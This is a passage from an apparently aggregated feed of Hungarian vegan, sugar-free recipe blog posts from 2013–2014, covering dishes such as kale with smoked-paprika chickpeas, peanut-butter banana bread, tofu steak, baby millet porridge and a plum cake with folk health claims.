szörfözni egy kicsit a neten… vagy ha nagyon fáradt vagyok, akkor ledőlök a kanapéra és alszom 5-10 percet. Ez a a villámgyors ebéd (és ebből egy sorozatot szeretnék itt a blogon) pirított fokhagymás citromos leveleskelből állt, valamint készítettem hozzá pirított füstölt paprikás, citromos csicseriborsót és főztem egy adag rizst. A hét közepén dobtam ezt össze először és annyira ízlett, hogy ma megcsináltam még egyszer, hogy le is tudjam fotózni. A leveleskelt még sörélesztő pehellyel ízesítettem, a csicseriborsót pedig füstölt piros paprikával és köménymaggal. A sörélesztő pehelyről... Aki még nem próbálta ki, annak jelzem, hogy nincsen se sör, se élesztő íze és nincsen erjesztő képessége sem. A sörélesztő egy vitamin kincsesbánya. “Található benne B-komplex, ami tartalmaz B1 vitamint (thiamin), B2 vitamint (riboflavin), B3 vitamint (niacin), B5 vitamint (pantoténsav), B6 vitamint (piridoxin), B9 vitamint (folsav), és H vagy B7 vitamint (biotin). Ezek segítenek a szénhidrátok, zsírok, fehérjék lebontásában. Jó hatással vannak az idegrendszerre, az emésztőrendszerre, valamint a bőr, a haj, a száj, és a máj egészségi állapotára. A sörélesztőben a létező 24 aminosavból 16-ot találhatunk. Jelentős a kálcium, króm, szelén, vas és foszfor tartalma. Találunk benne rezet, cinket és jódot is. A sörélesztőpelyhet egy egysejtű gombából, a Saccharomyces cerevisiae -ből készítik. Ezt a gomba fajt kifejezetten étrend kiegészítőkben való felhasználásra is szaporítják, gabonákon. Pehely formájában a sörélesztő már nem tartalmaz élő gombákat, így jó tudni, hogy candida-kúrán lévők is fogyaszthatják. Cukorbetegeknek is különösen ajánlott a fogyasztása, mivel a sörélesztő magas króm tartalma segíti a vércukorszint szabályozását. A cukorbetegek hasnyálmirigye nem tud megfelelő mennyiségű inzulint termelni, ami átalakítaná a vércukrot. Megfigyelések szerint a króm csökkentheti a vércukorszintet, ugyanakkor növeli a glükóz érzékenységet, így csökkentve a szükséges inzulin mennyiségét. A sörélesztő olyan energiaforrás, amely növeli állóképességünket, erősíti immunrendszerünket, javítja a máj működését, így hozzájárul a méregtelenítéshez.” (Forrás: innen.) Fogyasztása tehát nemcsak vegetáriánusoknak és vegánoknak ajánlott, hanem húsevőknek is. A füstölt édes paprikáról – ami pimiento paprikából készül – pedig ódákat tudnék zengeni. Illata mesés és ha főzünk vele a mennyországba jutunk… na jó, nem… de a vele ízesített ételeket teljesen átformálja. Állítólag aromáját az adja, hogy tölgyfahordókban tárolják. Én a képen látható dobozt Madridból kaptam, de bármilyen más márkájú füstölt paprika por használható az ételhez. Nagyon szeretem a savanykás ételeket, ezért a leveleskelre és a csicseriborsóra is facsartam egy kevés citromlevet és ahogy az ízek összeálltak, kerek egészet alkottak (úgy éreztem magam, mint Anto Ego, aki megkóstolta a ratatouille-t ). Végtelenül egyszerű étel, talán ebben rejlik nagyszerűsége. Néha nem kellenek különleges alapanyagok, órákig tartó főzés vagy sütés, mégis, amit leteszünk az asztalra magunk elé, megmelengeti a testünket, lelkünket és jól érezzük magunkat tőle. Elég a fecsegésből, jöjjön a recept! Pirított citromos leveleskel és füstölt paprikás csicseriborsó Hozzávalók 2 főre: - 1 közepes csokor leveleskel, a levelek eltávolítva a szárról és falatnyi darabokra tépkedve - 3 gerezd fokhagyma, meghámozva, összetörve - 2 evőkanál sörélesztő pehely - 1 konzerv (400 g) csicseriborsó, lecsöpögtetve - 1 fej vöröshagyma, meghámozva, felkockázva - 1 teáskanál füstölt, édes piros paprika - 1/­­2 teáskanál köménymag - 1/­­2 citrom leve - só, bors - kókuszzsír vagy olívaolaj - főtt rizs, köretnek Egy teflon serpenyőben hevítsünk 2 evőkanál kókuszzsírt, dobjuk rá a levelekelt és 5-6 perc után – ha megfonnyadnak kicsit a levelek -, adjuk hozzá a fokhagymát. Pirítsuk legalább 5 percig (ha nagyon száraznak találjuk öntsünk hozzá 50 ml vizet), sózzuk, borsozzuk, majd öntsük rá 1/­­4 citrom kifacsart levét és szórjuk meg a sörélesztő pehellyel. Keverjük meg és szedjük ki a tányérokra. Ugyanebben a serpenyőben (nem kell elmosni) hevítsünk újra 2 evőkanál kókuszzsírt, adjuk hozzá a felkockázott vöröshagymát. Dinszteljük 2-3 percig, majd szórjuk meg a füstölt paprikával, köménymaggal és adjuk hozzá a főtt csicseriborsót. Ízlés szerint sózzuk, borsozzuk. Főzzük 3-4 percig, majd locsoljuk meg a maradék 1/­­4 citrom levével. Tálaljuk a leveleskellel és rizzsel. Úgy érzem nagyon jól vesszük az akadályokat és úgy tűnik, hogy könnyebben “vészeljük” át a cukormentes kihívást, mint eddig valaha. Az első napokban nagyon sokat nasiztunk (főleg magokat: mandula, kesudió, paradió) étkezések után, mert hiányérzetünk volt (az a bizonyos kocka csoki ). Még jobban figyelek vásárláskor, címkét olvasok, hogy nehogy vegyek olyan élelmiszert, amiben van tojás, tejtermék vagy cukor. Figyeljetek oda, mert sok növényi tejben van cukor! Azért várom már a végét – mint mindig -, hogy valami finom édeset ehessek. Nagyon örülök, hogy rengetegen írtatok és csináljátok a kihívást. Sok-sok képet is küldtetek az ételekről, italokról, hogy mit esztek-isztok ebben a hónapban. Aki ír saját blogot és heti bontásban beszámol az élményeiről, az küldje el nekem a bejegyzés linkjét, beteszem ide. Aki használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Kitartást mindenkinek!

Vegán földimogyoróvajas banánkenyér

2014. január 28. Zizi kalandjai 

Vegán földimogyoróvajas banánkenyér Csak egy gyors bejegyzés, mert van sok tennivalóm, de nem akarlak benneteket édességek nélkül hagyni, szóval, ha minden jól megy ezen a banánkenyéren kívül még jön két édes recept január végéig, aztán irány a cukormentes februári kihívás. Van már néhány banánkenyér recept a blogon és mindegyiket imádom. Ez a földimogyoróvajas verzió azért született meg – mint a banánkenyerek többsége -, mert a hűtőben állt négy szinte feketeségig érett banán és nem volt szívem kidobni, így gyorsan cselekedtem. Mostanában ritkábban sütök, mert kevés rá az idő, de néha bevetem magam a konyhába és jól esik. Persze ez a kenyér is késő este készült és másnap délelőttig nem is ettünk belőle, amíg a fotózás meg nem történt. A banánkenyér földimogyoróvaj páros már régóta izgatta a fantáziámat és jó, hogy kipróbáltam, mert zseniálisak együtt. Természetesen saját készítésű vajat használtam hozzá, de a boltban kapható is megfelel. Tojás  helyett lenmaglisztet tettem bele és sülés során nagyon szépen meg is emelkedett, de mire kihűlt, beesett a teteje, de ez az ízén semmit nem változtatott. Mint a banánkenyerek többsége a banántól puha, omlós és ez napokig így is marad. Én extraként még a szeleteket megkentem földimogyoróvajjal, amikor ettem. Teával, kávéval kiváló reggeli vagy délutáni nasi! Vegán földimogyoróvajas banánkenyér Hozzávalók egy 23 cm-es formához: - 4 db érett banán, villával pépesre törve - 1 bögre teljeskiörlésű tönkölyliszt - 1/­­2 bögre tönköly fehérliszt - 1 teáskanál sütőpor - 1 teáskanál szódabikarbóna - 1/­­2 teáskanál fahéj - csipet só - 3 evőkanál lenmagliszt (őrölt lenmag) - 6 evőkanál víz - 1/­­3 bögre rizstej (szója-, mandula- és zabtej is használható) - 1/­­3 bögre földimogyoróvaj - 1/­­3 bögre nádcukor - 3 evőkanál kókuszolaj - 1 vaníliarúd kikapart magjai - földimogyoró, felaprítva Egy tálkában keverjük össze a lenmaglisztet a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra. A formát béleljük ki sütőpapírral. Egy tálban keverjük össze a száraz hozzávalókat: lisztek, sütőpor, szódabikarbóna, fahéj, só. Egy másik tálban keverjük össze a nedves hozzávalókat: banánok, rizstej, földimogyoróvaj, kókuszolaj, vanília és nádcukor. Adjuk hozzá a vizes lenmagot. A nedves hozzávalókat öntsük a szárazhoz és jól keverjük el a tésztát. Ezt öntsük bele az előkészített formába, szórjuk meg az aprított földimogyoróval, majd a 180 fokra előmelegített sütőben süssük, amíg aranybarna lesz (kb. 45-60 perc). Mielőtt kivesszük végezzünk tűpróbát, hogy a kenyér jól átsült-e.

Vegán kakaós mandulás quinoa süti reggelire

2014. január 22. Zizi kalandjai 

Vegán kakaós mandulás quinoa süti reggelire Ez egy olyan egyszerű, de nagyszerű és egyben különleges reggeli ötlet. A hétköznapi rohanások miatt (mindenki rohan hétköznap reggelente iskolába, munkába???) inkább hétvégére javaslom az elkészítését. Jó, ha igazán tudjuk élvezni egy csésze tea vagy kávé mellett. Mivel a süti alapját quinoa és darált mandula adja, ezért ez nemcsak vegán, hanem gluténmentes is. Datolyával és egy kis almapürével van édesítve és noha egy bögre datolya van benne, egyáltalán nem mondható édesnek. Éppen, hogy érződik, hogy édes az íze, szóval ez amolyan egészséges, tápláló reggeli… És ha már az édes íznél tartunk… egyelőre csak lélekben készülök a februári cukormentes kihívásra! És ti? Fizikailag még  nem annyira. Úgy eszem a csokoládét, mintha soha többet nem tudnék majd enni életemben. Az édes dolgok terén igyekszem magam visszafogni, de valahogy a csokoládét nem tudom mostanában elengedni. Tömöm magamba a 70-80%-os csokikockákat, általában este vacsora után, de néha napközben is. Ha tudom magam fegyelmezni, akkor napközben inkább rágcsálok mandulát vagy eszem egy almát. Már látom előre, hogy február elején elvonási tüneteim lesznek csokoládé és édesség terén. Viszont várom már, hogy kicsit tisztuljon a szervezetem és tisztábban érezzem az ízeket. Meg persze márciustól sokkal kevesebb édességet fogok enni, mert nem fogom annyira kívánni… egészen novemberig, decemberig. Akkor majd újra belehúzok, hogy legyen mit kiméregteleníteni a szervezetemből jövő februárban. Remélem sokan velem tartotok majd! És akkor jöjjön végre a recept! Vegán kakaós mandulás quinoa süti Hozzávalók egy kb. 20*20 cm-es kocka szilikon formához: - 1 bögre quinoa - 1 és 1/­­2 bögre mandulatej (rizs-, zab- és szójatej is használható) - 1 bögre aszalt datolya, kimagozva - 3/­­4 bögre darált mandula - 1/­­2 bögre lenmag - 1/­­2 bögre almapüré - 1/­­3 bögre cukrozatlan kakaópor (karobpor is használható) - 1/­­2 teáskanál Himalaya kristálysó (A recepthez használt bögre 250 ml-es.) Mossuk át a quinoát és tegyük egy lábasba 2 bögre vízzel. Főzzük meg kb. 15 perc alatt, hagyjuk hűlni 5-10 percig, majd villával keverjük át. Melegítsük elő a sütőt 180 fokra. Ha nem szilikon formát használunk, akkor a tepsit béleljük ki sütőpapírral és tegyük félre. Én magam reszeltem le az almát baba almareszelővel, de ha  nincs ilyenetek, akkor vehettek almapüré bébiételt is, ez is megfelelő. Konyhai robotgépben pürésítsük a mandulatejet, datolyát, lenmagot, almapürét, kakaót és sót. Ezt a mixet öntsük egy tálba és jól keverjük össze a megfőtt quinoa-val, valamint 1/­­2 bögre darált mandulával. Öntsük a formába, kanállal simítsuk ki a tetejét és szórjuk meg a maradék 1/­­4 bögre darált mandulával. Süssük kb. 60 percig, amíg összeáll. Hagyjuk teljesen kihűlni, majd vágjuk kockákra és tálaljuk.

Csípős pirított tofu steak

2014. január 7. Zizi kalandjai 

Csípős pirított tofu steak Nem tudom ki, hogy van vele, de én ma este már rosszul lettem az édes íztől, a csokitól és a süteményektől. Telítődtem az elmúlt év során, főleg decemberben. Ahogy kevesebbet süt a nap, az az egy-két-három kocka 70%-os csoki elmaradhatatlan ebéd és vacsora után is. Sőt néha napközben csak úgy… Éreztem, hogy ma estére a testem frissért, nyersért, zöldért kiáltott és mindennél jobban kívántam a cukormentes februári kihívást! Mondjátok, hogy ti is vágytok rá!!! Szóval az idén sem fog elmaradni a kihívás… szeretnék most szigorúbb lenni magammal (és veletek, ha beszálltok!) és még inkább “megtisztítani” a szervezetemet a savasító ételektől, italoktól. Remélem lesznek társaim a 28 nap alatt és nem magányos farkasként fogok menetelni az úton… ugye van egy cél (méregtelenítés, tisztább test, ragyogóbb bőr, stb.), de mindig az odáig vezető út a legfontosabb. És ha ezt még van is kivel megosztani, akkor hálásak lehetünk!  Aki tavaly beszállt, az tudja mire számíthat… aki pedig újként fog csatlakozni, az megtanulja próbára tenni magát, a türelmét, a testét és az édes íz iránti addikcióját. Igen, mindannyian cukorfüggők vagyunk, még ha ezt próbáljuk is tagadni! A lényeg, hogy aki velem tart, az már most kezdje el lélekben felkészíteni magát… persze testben is készülhetünk… például kevesebb csokit eszünk és egy szelet süti helyett inkább válasszunk egy almát uzsonnára. Édes receptek még lesznek ebben a hónapban, de most itt egy olyan gyors hétköznapi vacsora ötlet, amely feldobhatja a rutinná vált vacsorára készült receptjeink tárházát. Én karácsonykor is elkészítettem és azok, akik még nem próbálták a családból, elismerően bólogattak, hogy a tofu tényleg finom. Egy kis nedves és száraz pác, majd forró, száraz serpenyőben pirítás (majdnem feketítés!) és kész is… tálalhatjuk rizzsel vagy burgonyapürével, bármilyen zöldséggel. Én kelbimbót pirítottam hozzá. Csípős pirított tofu steak Hozzávalók 2-3 főre: - 300 g tofu, felesleges víz kipréselve belőle, majd 4-6 egyforma szeletre vágva - 4 evőkanál szójaszósz - 2 evőkanál pirított szezámolaj - 4 teáskanál pirospaprika - 2 teáskanál őrölt feketebors - 2 teáskanál tápióka keményítő (kukorica keményítő is használható) - 1 teáskanál Himalaya kristálysó vagy tengeri só - 1/­­2 teáskanál friss vagy szárított oregánó - 1/­­2 teáskanál friss vagy szárított kakukkfű - 1/­­4 teáskanál cayenne bors - 3 gerezd fokhagyma, felaprítva - kevés kókuszzsír vagy napraforgó olaj Egy tányérban/­­tálkában keverjük össze a szójaszószt a szezámolajjal. Egy másik tálkában pedig keverjük össze a száraz hozzávalókat: pirospaprika, feketebors, keményítő, só, oregánó, kakukkfű, cayenne bors. A tofu szeleteket tegyük a nedves pácba és hagyjuk 5 percig állni, majd forgassuk meg a száraz pácban is úgy, hogy minden oldalukat befedje a pác. Egy teflon serpenyőt forrósítsunk fel, majd tegyük bele a bepácolt tofu szeleteket és süssük mindkét oldalukon 2-3 percig, amíg majdnem megfeketednek. Vegyük ki, majd állítsuk takarékra a lángot, tegyünk egy kevés kókuszzsírt a serpenyőbe és pirítsuk meg a felaprított fokhagyma gerezdeket. Tálaljuk a tofu steaket pirított fokhagymával megszórva. Jó étvágyat!

Karácsony és Szilveszter 2013., szemezgető:)

2014. január 2. Vegagyerek 

Karácsony és Szilveszter 2013., szemezgető:) Hát, idén is elmúlt...:) Jó hosszú sütős-főzős időszak volt, mert a fiam szülinapja december közepén van, úgyhogy a Mikulás után mi már akkor kezdjük az ünneplést:). Szülinapi torta a suliba (idén snowboard-os, bár annyira nem volt felismerhető...:DD), aztán karácsonyi buli az oviban, majd a suliban, és utána jött még csak az igazi Karácsony.:) Sőt idén Szilveszterkor is családi vendégségbe mentünk, ahova szintén készültem. Ebben az ünneplős időszakban viszont volt néhány kifejezetten jól sikerült darab, amit már a gyerekek is többször szívesen fogyasztottak (na jó, persze az édességek voltak ezek legfőképp!:)). Lássuk, szépen sorban, mik készültek decemberben, aztán jönnek majd remélhetőleg a receptek is!:) Az Adventet ezzel a csokimázas márvány-kuglóffal indítottuk, amit a 8 éves fiam készített teljesen egyedül!:) A fehér hópelyhek és csillagok csak kókuszolajból, rizslisztből és cukorból vannak (dr. Oetker), a gyöngyökben hát ja, van némi aroma, khmkhm.. . A fiam szülinapi tortája a vegán Napfényes Cukrászatból, tej- és tojásmentes oroszkrém torta. Nekünk felnőtteknek nagyon ízlett, de a gyerekek annyira nem értékelték a a pirított mandulaszeleteket.:) Az óvodai és az iskolai Karácsonyra készültek ezek a mini muffinok, az abszolút Jolly Joker recept arra az esetre, amikor csak max. 35 percet tudunk tölteni a sütikészítéssel (a sütést és a díszítést is beleértve!:) A muffinok tésztája a sokszor bizonyított tej- és tojásmentes piskóta alap, amit ilyenkor muffinformákba kanalazok, étcsokimázzal megkenem és díszítem. A tésztát oviba - suliba úgy szoktam készíteni, hogy 50% fehér és 50% teljes kiőrlésű liszttel készítem. Az összes elfogyott!:) Fenyőmagos karfiolpástétom, egy olasz recept, kiváló előételnek Karácsonyra! Isteni finom volt!:) Reform gyümölcskenyér, ami nagyon natúr ízvilágú, teljesen cukormentes, igazi fehérjebomba! 1-2 szelet sok órára eltelít! A receptje a Vegán Kihívás receptjei között szerepelt, ITT, a 20. napnál! Az egyes számú és újból beigazolódott konklúzió, hogy mi nem vagyunk aprósütisek!...:))) Amikor Karácsony előtt beindul mindenhol a neten az aprósüti-dömping, meg vagyok győződve róla, hogy ezt imádjuk (om?:), ezért nekiállok. Aztán néhány darab után mégsem fogy, csak ott áll...:DDD Az idei próbálkozások közül viszont a mini islert megtartjuk, annak volt a legnagyobb sikere, és a gyerekek imádták csokiba mártogatni a linzer karikákat, könyékig elmerülve a csokiban...:)))) A linzerkarikákhoz az alaprecept a szokásos volt, 4 cm átmérőjű pogácsaszaggatóval szaggattuk, aztán házi baracklekvárral összeragasztottuk és végül csokiba mártottuk. A tányéron balról-jobbra van egy lekváros-darált diós csiga (még az volt a második legfinomabb), sima kis karikák, az isler, és mandulás-omlós kiflik. December 24-én ebédre: - kókusztejes kukoricakrémleves volt, nagyon finom, megtartjuk!:) - utána pedig a szokásos mákos guba. Szenteste a vegán verzió a vacsorán belül volt Kata kesudiósültje, ami továbbra is isteni finom, imába foglalom érte mindig a nevét!:)) Mellé köretnek céklamártás és agave szirupos, fűszeres sütőtök. Mmmmmmmm.....!:)) December 25-én pedig Anyukám készítette a vegán töltött káposztát. Desszertnek ugyancsak Kata rakott, vaníliapudingos, rizstejszínhabos piskótája készült, és a szokásos mézes krémes. Szilveszterkor vendégségbe mentünk, ahova a legtutibb hozzájárulásunk ez a vegán almás krémes volt!:) Az év legszuperebb felfedezése-ízvilága sütiben a számomra!:) Recept hamarosan!:) Ezen kívül vittem: - paradicsomos vöröslencsekrémet - csicseripástétomot - fűszeres magokat.

Narancsos csokis korongok (glutén, tej, tojás, cukormentes, majdnem teljesen nyers)

2013. december 18. VegaLife 

Narancsos csokis korongok (glutén, tej, tojás, cukormentes, majdnem teljesen nyers)Teljesen elaléltam. Sok helyen olvastam már, hogy avokádóból lehet csokikrémet készíteni süteményhez, de mindig kicsit hitetlenkedő voltam. Itt kószált az agyamba, hogy ki kell próbálni. Hetek óta újra és újra vettem az avokádót (kilóárban egy piacon), de mindig kenyérrel és zöldséggel fogyott el. Egyszerűen nem hagyott akkor sem nyugodni. Kellett valami alkalmas idő, amikor lendületben vagyok, amikor a kíváncsiságom a tető fokára hágott, amikor az alkalom is hozta magával, hogy süteményt készítsek. Nos a héten mindez összeállt. Minap korábban hazaértem. Egyedül voltam, konyha rendben. Még jó néhány kilométerre voltam, de a gondolataim már szinte valóságban éltek, ahogy elképzeltem, igen, most elkészítem, itt az idő! Pillanatok alatt kész lett a turmixgéppel. Azonnal hívtam a férjemet és nem is tudtam teljesen szavakba önteni azt a mámort, amit átéltem! Van egészséges(ebb) csokikrém! Igen, margarin és vaj nélkül is lehet készíteni, de még milyet! Olyan finomat, amilyet korábban margarinnal vagy vajjal nem tudtam reprodukálni. ÓÓÓÓÓ!!! Egyszerűen úgy feldobott az élmény. Viszem is az évzáró együttlétre, ami ma este lesz. Persze a krém nem áll meg magában, készítettem hozzá kis tallér féléket, és az egészet naranccsal spéciztem fel. Így ni: A  korongok receptje: Hozzávalók: 1/­­2 kg darált zabpehely 15-20 dkg kókuszreszelék növényi tejpor víz édesítőszer (gyümölcscukor, xilit, méz, nyírfacukor, barnacukor - ki mit használ) Elkészítés: A tejporból és vízből kb. 3-4 dl növényi tejet készítünk. (Persze, ha nem sietős, nem tejporos növényi tejet is készíthetünk, "igazi" hozzávalókból - pl. kókusztejet.) A megdarált zabpelyhet és kókuszreszeléket egy tálban összekeverjük, édesítjük ízlésünknek megfelelően és annyi tejet öntünk rá, hogy az egészből egy nagy gömböcöt, egy golyót tudjunk gyúrni. Kókusszal megszórt deszkán kinyújtjuk és kis pogácsaszaggatóval kiszaggatjuk a tésztát. A tetejére pedig krémet fogunk tenni. A  csokikrém receptje: Hozzávalók: - 1,5-2 db érett nagy avokádó (én másfél darabbal dolgoztam) - 2 dkg karobpor (kakaóval is készíthető - lesz majd ilyen receptem is!) - 1 narancs reszelt héja - 1 narancs felének a leve - 1 narancs cikkekre vágva - 5 dkg kókuszolaj - 10 dkg aszalt datolya - kimérés után nagyon kevés meleg vízben áztathatjuk (helyettesíthető más édesítőszerrel, pl: nádcukorral, nyírfacukorral, mézzel, ki mit használ.) - 1 csipet tengeri só   Elkészítés: Vegyük elő a turmixgépet és a fentieket mindet, ebben a sorrendben tedd bele. Indítsuk el, és hamarosan látni fogjuk hogy milyen fantasztikus krémet kapunk végeredménynek. Olyan krémet, mint a csokitorták csokikrémje. Na már most, ha hígabb krémet szeretnénk, adhatunk hozzá egy kevés vizet és így turmixoljuk. Ennél a sütinél én lágyabb krémet készítettem. A kész krémet habzsákba, vagy egyszerű zacsiba kanalazzuk és mehet a korongok "krémezése". Ha nem habzsákkal dolgozunk, a zacsi egyik sarkát egyszerűen levágjuk és kisebb nyomásra kunkorodik is a zsákból a krém. A krém tetejére egy-egy narancscikket teszünk. Hűtőben tároljuk tálalásig. Ha gyors, egészséges sütit készítenél karácsonyra, ne habozz, válaszd ezt, ha csokikedvelő vagy, nem fogod megbánni. Ha nem vagy még "karobpárti", akkor készítsd kakaóval, s tényleg nagyon finom "csodában" lesz részed. Sűrűbb csokimassza: Hígabb csokimassza:  

Hozzátáplálás - nyitóbejegyzés és őszibarackos kölespép 6+ 8+

2013. november 19. BioBrigi 

Hozzátáplálás - nyitóbejegyzés és őszibarackos kölespép 6+ 8+Úgy döntöttem, hogy lesz egy új cimke: a hozzátáplálás. Csakhogy akkor azt is mellé kellene tenni, hogy hány hónapos kortól adható az adott étel, így az az egy cimke legalább 6-8 lesz. A bejegyzések nem igazán receptek, inkább ötletadóak.  A mennyiségek egy adagra értendők, a picúr "belességétől" és korától függően ez természetesen tág határok között változik. Ábel pl. gyümölcsökből fél éves kora óta képes bevágni egy bögrényi adagot, míg a zöldségfélékből többnyire a negyedét eszi meg. Általában a reggeliket úgy igazítom, hogy mindketten nagyjából ugyanazt együk, így nem kell külön főzni pl. két kanál kölest, és az sem probléma, ha jóllakottan odajön a kis Mazsola és úgy kunyerál az enyémből, mintha nem az előbb reggelizett volna. Mert minden egyes alkalommal ezt csinálja, legyen az bármi, amit eszek, az sokkal finomabb, még akkor is, ha az övé tényleg jobb volt. Eleinte voltam bajban, amikor még nem vezettünk be bizonyos dolgokat - a fokozatosság elvére érdemes figyelni, és először egy kanállal, másnap kettővel, azután többel kaphat. Ellenkező esetben nagy pocakfájásokat tudnak produkálni. Akkor azt csináltam, hogy az Ő papijából kanalaztam a tányéromra, és a nagy kanállal bevágta, mint zsanna-mannát, míg előtte 5 perccel kínálgatni kellett a kiskanalával, hogy még egy falatot...? Persze ezzel viszont azért vigyázzon az ember, mert mászkálni akar majd a rendes evés közben is. Legjobb lett volna nem az orra előtt enni, de mivel egyedül voltunk, máshogyan nem tudtam megoldani. Egyébként nem kell megijedni, eleinte nagyon ügyetlenek, de iszonyú lelkesek is tudnak lenni egyben a babák. Ebből jön aztán a nagy falat, meg a fuldoklós köhögés, de többnyire ügyesen megoldják. Ha mégis úgy érzed, hogy kell egy kis segítség, finoman meg kell ütögetni a kis háta közepét. Az első egy őszibarackos kölespép, aminek ugyan már nincs szezonja, de cukormentes (értem ezalatt azt, hogy nem édesítőszerrel elrakott)  befőttből is vehetünk ki egy darabot, és akkor bármikor elkészíthetjük. Nyári időszakban jó, ha félmeztelenül adod neki ;), mert a barack semmiből nem akar kijönni, csak ha azonnal kimosod. Vagy később citromlével dörzsölöd, kínlódsz. Hozzávalók: 1  db őszibarack 2 ek főtt köles 8+ 1 tk őrölt mandula Az őszibarackot meg kell hámozni. A kölest négyszeres mennyiségű vízben icipici só hozzáadásával bő 20 perc alatt főzzük meg. Adhatunk hozzá vaníliát (A dm-ben vettem vaníliaőrlőt, drága, 4 vaníliarúd áráért kapod, de van benne 3 db összevágva, így már nem is olyan borzasztó, sokkal könnyebb a dolgod vele.) és gyümölcscukrot, ha magunknak készítjük. A picurkáknak eleinte elég a barack édeskés íze hozzá. Ha betöltötte a baba a 8 hónapos kort, őrölt olajos maggal kiegészítve teljes értékű táplálékot kap. Először próbálkozzunk mandulával, kesudióval, törökmogyoróval. Később mákkal, szezámmaggal, tökmaggal. Turmixgéppel pürésítsük össze.

Vegán almás fahéjas palacsinta juharsziruppal

2013. november 10. Zizi kalandjai 

Vegán almás fahéjas palacsinta juharsziruppal Hol vannak már a jó kis palacsintás vasárnapi reggelik? Egyszerűen nem jut most idő ilyenre, mert van egy örökmozgónk, aki állandó figyelmet követel és hiába kuktáskodik már mellettem 4 hónapos kora óta , azért annyira még nem érdeklődik a főzés iránt, hogy órákat töltsön velem a konyhában. Naponta egy alkalommal tudok főzni/­­sütni vagy ebédre vagy vacsorára és többnyire valami egyszerűt dobok össze az éppen rendelkezésre álló alapanyagokból. Így született már gombapörkölt brokkolival extrázva vagy megmaradt brokkolis paradicsomos szósz tükörtojással vega pecsenyezsíros pirítóssal és sok-sok nyers zöldséggel; ha van sült sütőtök, akkor percek alatt összedobok egy sütőtökös póréhagymás tésztát vagy az egyik kedvencem a pirított fokhagymás tofu kockák rizzsel és valamilyen zöldséggel tálalva. Igen, a kombinációk tárháza kifogyhatatlan! A lényeg az egyszerűségen és a gyorsaságon van. Remélem hamarosan visszatérhetek a konyhába több időre, akár, hogy palacsintát süssek… addig pedig marad a villámgyorsan elkészíthető és isteni finom mandulavajas zabkása. Ez most a hetente többször előforduló favorit reggeli. Ez azért is jó, mert a zab főleg téli eledel melegítő hatása miatt (és egy kis melegség nem árt most testnek és léleknek), anyatej serkentő hatásáról nem is beszélve (szoptatós anyukáknak kötelező)! Szóval ez az almás fahéjas palacsinta még korábban készült, amikor készültem előre, hogy a blogon mindig legyenek új receptek, akkor is, amikor kevesebb időm marad a főzésre. Ugyanúgy, mint a többi palacsinta recept, nem bonyolult elkészíteni, tehát adjatok neki egy esélyt jövő hétvégén. Ja, a tésztáját csak az alma édesíti, szóval cukormentes is! Vegán almás fahéjas palacsinta juharsziruppal Hozzávalók kb. 10 db-hoz: - 1 bögre teljeskiörlésű tönkölyliszt - 1/­­2 bögre és 2 evőkanál tönköly fehérliszt - 1 és 1/­­2 evőkanál foszfátmentes sütőpor - 1/­­2 teáskanál fahéj - 1 és 1/­­2 bögre zabtej (rizstej, mandulatej, szójatej is használható) - 2 evőkanál kókuszolaj - 1 közepes alma, reszelve - csipet só - juharszirup Egy tálban keverjük össze a száraz hozzávalókat: lisztek, sütőpor, fahéj, só. Egy másikban pedig a nedves hozzávalókat: zabtej, kókuszolaj, reszelt alma. Öntsük a nedves hozzávalókat a szárazhoz és keverjük addig, amíg sima, sűrű tésztát kapunk (ha túl sűrűnek találjuk, hígítsuk egy kevés zabtejjel). Hagyjuk 5 percet állni, hogy a tészta megkeljen. Tegyünk egy kevés kókuszzsírt a teflonserpenyőbe és forrósítsuk fel. Kisebb adagot kanalazunk (2 adag is mehet egyszerre) a palacsinta tésztából a serpenyőbe, közepes lángon sütjük az egyik oldalukat, amíg aranybarnák lesznek. Megfordítjuk és a másik oldalukon is sütjük 1-2 percig. Tálaljuk juharsziruppal meglocsolva.

Mogyorós Túrógombóc

2013. szeptember 28. Fittanyuka Blog 

Mogyorós Túrógombóc Ez a gombóc egy korábbi receptem újragondolva. Annyiban változott a recept, hogy nemcsak tej,-tojás,-cukormentes, hanem gluténmentes is. Nagyon finom, fogyaszthatjuk desszertként, vagy akár egy ebéd második fogásaként. A gyerekek imádni fogják:)! Hozzávalók: 150 g köles 80 g nyírfacukor 500 ml növényi tej 50 g bio margarin 1 db citrom lereszelt héja 1/­­2 citrom leve késhegynyi őrölt bourbon vanília Morzsa: 200 g török mogyoró 3-4 evőkanál kókusz cukor 1 tk bio margarin A kölest a nyírfacukorral, vaníliával együtt puhára főzzük a növényi tejben. Ha szükséges öntünk hozzá kevés vizet, hozzákeverjük a citromlevet, citrom lereszelt héját és a margarint. Lefedjük és hagyjuk teljesen kihűlni. Én előző este elkészítem és másnap már csak gombócokat formázok belőle. A mogyorót megőröljük és a bio margarinon kissé megpirítjuk. Vizes kézzel tetszőleges nagyságú gombócokat formázunk és meghempergetjük a mogyoró morzsában. Tálalás előtt megszórjuk a kókusz cukorral!Fittanyuka

Fahéjas Szilvás lepény

2013. szeptember 4. Fittanyuka Blog 

Fahéjas Szilvás lepény Tej,-tojás,-cukormentes   Kertünkben az orvosság. Erdélyben rengeteg kék szilva terem és fekete, hegyi áfonya. Megfigyelték, hogy azokban a falvakban ahol ezt a két gyümölcsöt rendszeresen fogyasztják és az ebből készült lekvárokat nem ismerik a rákos megbetegedéseket,  legalábbis jóval ritkábban fordulnak elő, mint más falvakban, településeken ahol nem fogyasztják ezeket a gyümölcsöket  Mindenki az áfonyát ismeri úgy, hogy nagyon magas az antioxidáns tartalma, az egyik legmagasabb az orac értéke. Viszont kevesen tudják, hogy a szilvának magasabb az orac értéke és utána következik a fekete áfonya. Kék szilva orac értéke /­­ 100 g  - 5700 Fekete áfonya orac értéke /­­ 100 g - 2400 Szilva élettani hatásai: Kevés cukor és magas víztartalom jellemzi a friss szilvát. Mintegy 85% víz van benne, ezért jól oltja a szomjat. 100 gramm gyümölcs nagyjából 50 kalória (209 KJ) energiát hordoz. Szénhidráttartalma 10,3 g körüli. Vitaminjai közül az A-, az A-provitamin, a béta-karotin, a B1- és B2-, illetve csaknem valamennyi B-vitamin, továbbá a C-vitamin érdemelnek említést. Nagyobb mennyiségben tartalmaz ásványi anyagokat (kálium, kalcium, foszfor és magnézium) és cinket. A növényi antioxidánsok közül antocián színanyagokat és flavonoidokat; rutint és quercetint tartalmaz 